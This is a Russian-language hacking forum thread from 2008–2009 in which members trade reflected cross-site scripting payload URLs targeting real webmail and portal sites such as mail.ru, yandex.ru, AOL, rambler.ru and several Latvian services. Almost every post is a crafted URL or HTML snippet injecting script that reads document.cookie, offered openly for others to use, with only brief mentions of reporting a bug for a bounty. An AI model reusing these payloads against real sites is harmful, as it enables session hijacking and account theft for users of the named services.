Пассивные xss на почтовых серверах

Discussion in 'Уязвимости Mail-сервисов' started by Constantine, 25 Oct 2008.

  1. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    на yandex.ru создаем новое событие в календаре,
    назваагние пишем любое , в описание <img src = http://artfile.ru/funfoto/b/v/1939_26_186_ArtFile_ru.jpg onload = alert(123);>
    при просмотре события вылазит алерт"123"
    p.s сори еси не туда написал )
     
  2. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    mail.ru

    Code:
    [COLOR=White]http://g1.botva.mail.ru/registration.php?race=1<'><script>alert(document.cookie)</script>[/COLOR]
     
    3 people like this.
  3. JOHNik

    JOHNik Member

    Joined:
    21 Apr 2009
    Messages:
    51
    Likes Received:
    14
    Reputations:
    0
    То же самое и тут (PREF TM LM S)
    такая же трабла и с AOL например:
    Code:
    http://television.aol.com/search/results?searchby=showtitle&query="><script>alert(document.cookie)</script>
    просто это не те которые нужны. :( но идея с переводом документа хорошая
     
    #43 JOHNik, 20 Aug 2009
    Last edited: 20 Aug 2009
    3 people like this.
  4. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    там же, куча пассивок, вывешивать не стал чтоб не флудить, но xss на каждом шагу, щя поищу активку

    Code:
    https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cac%3aWS%7cat%3aSNS%7cld%3awebmail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aAOL%7csnt%3aScreenName&offerId=mail-second-en-us&seamless=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    _________________________
    2 people like this.
  5. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    пассивная XSS на рамблер, только что нашел

    Code:
    http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&uid=4513&page=200&num=5&end=080911&type=16&start=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E0&iid=27203
    Code:
    http://adstat.rambler.ru/reports/rep_show.pl?sid=4294961443&page=206&uid=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E3&end=080911&type=16&iid=27203&start=080910
    Правда в этой строке их до фига и больше...
     
    _________________________
    #45 Uex Urgent, 30 Aug 2009
    Last edited: 30 Aug 2009
    10 people like this.
  6. xss-faq

    xss-faq Banned

    Joined:
    28 Jun 2009
    Messages:
    0
    Likes Received:
    57
    Reputations:
    5
    xss mail.ru
    Code:
    http://wifi.mail.ru/comments.html?point_id=6568&thread="><script>alert(document.cookie)</script>
    xss yandex.ru
    Code:
    http://images.yandex.ru/cgi-bin/customize.pl?retpath=http://yandex.ru/yandsearch?text="><script>alert(document.cookie)</script>
    Сам искал! :p
     
    8 people like this.
  7. vitaliy_n73

    vitaliy_n73 Member

    Joined:
    2 Jul 2009
    Messages:
    98
    Likes Received:
    21
    Reputations:
    0
    Вот пару месяцев назад нашел,думал буду пользоватся,ща как-то не пригодилось так чтоб зря не пропадала берите пользуйтесь на здоровье!


    http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ealert()%3C/script%3E
     
    5 people like this.
  8. Travakur555

    Travakur555 New Member

    Joined:
    14 Sep 2009
    Messages:
    6
    Likes Received:
    3
    Reputations:
    -5
    e-mail

    http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert(%27Sin3v %27)%3C/script%3E
     
    2 people like this.
  9. Sin3v

    Sin3v Banned

    Joined:
    16 Jul 2008
    Messages:
    11
    Likes Received:
    95
    Reputations:
    9
    Mail.ru
    Работает у авторизованных.
     
    1 person likes this.
  10. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    пассивка на рамблере

    строка Найти забаненного
    PHP:
    <img src=foo.png onerror=alert(document.cookie) />

    еще одна пассивка на рамблер

    PHP:
    http://autorambler.ru/cars/by-price/?price_from=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&raz=1&price_to=250000&model=303&skip=0&currency=RUR
     
    _________________________
    #50 Uex Urgent, 24 Sep 2009
    Last edited: 21 Oct 2009
    4 people like this.
  11. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    это тоже твой xss, нашел уже с твоей подсказкой

    http://torg.mail.ru/109/res/?"><script>alert(document.cookie)</script>[vendor_id][]=49
     
    _________________________
  12. Ruslan1817

    Ruslan1817 Active Member

    Joined:
    17 Jan 2009
    Messages:
    12
    Likes Received:
    256
    Reputations:
    146
    https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1"><script>alert('Sin3v')</script>
    от Sinva

    подправил
    https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1%3Cimg%20src=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    #52 Ruslan1817, 24 Sep 2009
    Last edited: 24 Sep 2009
  13. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    а ты развивай ту. которую начал)))), вот тебе еще пассивка на майл

    улови какая разница между вышестоящим и этим урл ниже

    как только догонишь, найдешь кучу пассивных xss на майле ;) не забудь убрать пробелы
     
    _________________________
    #53 Uex Urgent, 27 Sep 2009
    Last edited: 21 Oct 2009
    1 person likes this.
  14. darkwkz

    darkwkz Member

    Joined:
    17 Mar 2009
    Messages:
    57
    Likes Received:
    60
    Reputations:
    -1
    one.lv
    PHP:
    http://c3.one.lv/welcome?language=ru%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
     
  15. Details

    Details New Member

    Joined:
    28 Sep 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    pochta.ru

    http://www.pochta.ru/games/?ids=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E :cool:
     
  16. Details

    Details New Member

    Joined:
    28 Sep 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Уже прикрыли)) :D
     
  17. darkwkz

    darkwkz Member

    Joined:
    17 Mar 2009
    Messages:
    57
    Likes Received:
    60
    Reputations:
    -1
    inbox.lv забугорный сайтец.
    http://help.inbox.lv/?language=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://work.inbox.lv/darbs/o-%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    1 person likes this.
  18. Travakur555

    Travakur555 New Member

    Joined:
    14 Sep 2009
    Messages:
    6
    Likes Received:
    3
    Reputations:
    -5
    ыыыы

    Чтот не рабочии твои хсс :D
     
    1 person likes this.
  19. darkwkz

    darkwkz Member

    Joined:
    17 Mar 2009
    Messages:
    57
    Likes Received:
    60
    Reputations:
    -1
    сообщил администрации, в общем можно сказать получил 120 $ ))
     
    1 person likes this.
  20. darkwkz

    darkwkz Member

    Joined:
    17 Mar 2009
    Messages:
    57
    Likes Received:
    60
    Reputations:
    -1
    Хxsка на сайте Латвийского оператора, я им сообщил птм они мне звонили и в общем уже 3 дня прошло а залатать не могут.В общем там тоже можно считать как эмайл...
    http://zeltazivtina.lv/ru/search?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
    Там в поиске еще активка есть)
     
    #60 darkwkz, 6 Oct 2009
    Last edited: 6 Oct 2009
    1 person likes this.